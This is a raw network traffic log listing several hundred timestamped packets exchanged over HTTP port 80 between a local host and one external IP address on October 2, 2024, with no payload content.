Oct 2, 2024 23:10:12.145740032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.145750046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.145771980 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.145795107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.146317005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.146327972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.146374941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.188235044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.199595928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.411804914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.411820889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.411829948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.411919117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.412308931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.412363052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.412373066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.412384987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.412414074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.412425041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.412811995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.412822008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.412831068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.412841082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.412863016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.412892103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.416632891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.416644096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.416693926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.416824102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.416836023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.416843891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.416853905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.416862965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.416872025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.416879892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.416882038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.416892052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.416898012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.416901112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.416910887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.416914940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.416933060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.416953087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.416982889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.417026043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.422424078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.422456980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.422488928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.422521114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.422521114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.422540903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.422540903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.422564030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.423800945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.423852921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.423984051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.423995018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.424004078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.424012899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.424027920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.424037933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.424062967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.425220013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.425271034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.425354958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.425368071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.425375938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.425404072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.425421000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.425919056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.425966024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.426106930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.426119089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.426126003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.426134109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.426142931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.426152945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.426156044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.426161051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.426177979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.426206112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.427145958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.427158117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.427165985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.427175045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.427184105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.427194118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.427197933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.427215099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.427222967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.428647041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.428657055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.428663969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.428673029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.428683043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.428692102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.428693056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.428702116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.428710938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.428724051 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.428747892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.428831100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.428842068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.428849936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.428858995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.428869009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.428869963 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.428901911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.428922892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.428978920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.429018021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.429503918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.429516077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.429523945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.429533005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.429541111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.429548979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.429550886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.429559946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.429568052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.429594994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.429827929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.429840088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.429848909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.429857016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.429867983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.429893970 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.429976940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.429989100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.429996967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.430016994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.430038929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.430165052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.430202961 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.430357933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.430370092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.430378914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.430387020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.430396080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.430399895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.430418015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.430442095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.431251049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.431262016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.431269884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.431279898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.431293964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.431318998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.431487083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.431529045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.431693077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.431705952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.431715012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.431736946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.431746960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.431879044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.431893110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.431922913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.431943893 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.432605028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.432616949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.432626009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.432647943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.432657003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.432753086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.432792902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.432833910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.432845116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.432852983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.432877064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.432885885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.433722019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.433733940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.433742046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.433752060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.433767080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.433790922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.433881998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.433892965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.433900118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.433922052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.433943987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.434636116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.434648037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.434654951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.434679031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.434695959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.499732018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.499747038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.499758005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.499813080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.499839067 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.499898911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.499908924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.499918938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.499928951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.500027895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.500027895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.500607967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.500619888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.500662088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.500677109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.500781059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.500792980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.500802040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.500811100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.500848055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.500876904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.500916004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.500926971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.500957966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.500967979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.501807928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.501957893 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.501983881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.501996040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.502006054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.502016068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.502027035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.502048016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.502075911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.502856016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.502866983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.502875090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.502886057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.502895117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.502906084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.502911091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.502938032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.502947092 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.503674984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.503685951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.503694057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.503726006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.503748894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.503851891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.503864050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.503902912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.504532099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.504544973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.504576921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.504597902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.504692078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.504703999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.504713058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.504723072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.504739046 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.504749060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.504775047 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.505517006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.505528927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.505538940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.505563974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.505590916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.505670071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.505682945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.505714893 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.505913973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.506546021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.506556034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.506565094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.506593943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.506618023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.506752968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.506763935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.506772995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.506803036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.506824970 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.507405996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.507417917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.507427931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.507437944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.507447958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.507466078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.507493973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.508438110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.508450031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.508459091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.508467913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.508476973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.508486032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.508488894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.508516073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.508533001 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.509121895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.509172916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.509251118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.509263992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.509272099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.509284019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.509293079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.509305000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.509331942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.510108948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.510119915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.510128975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.510170937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.510257006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.510267019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.510308027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.511101961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.511113882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.511126995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.511136055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.511143923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.511153936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.511162043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.511182070 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.511195898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.511938095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.511950970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.511959076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.511967897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.511996031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.512018919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.512089968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.512136936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.513005018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.513016939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.513026953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.513036013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.513044119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.513053894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.513063908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.513091087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.513686895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.513741016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.513822079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.513833046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.513842106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.513851881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.513860941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.513873100 CEST	49704	80	192.168.2.5	185.215.113.37
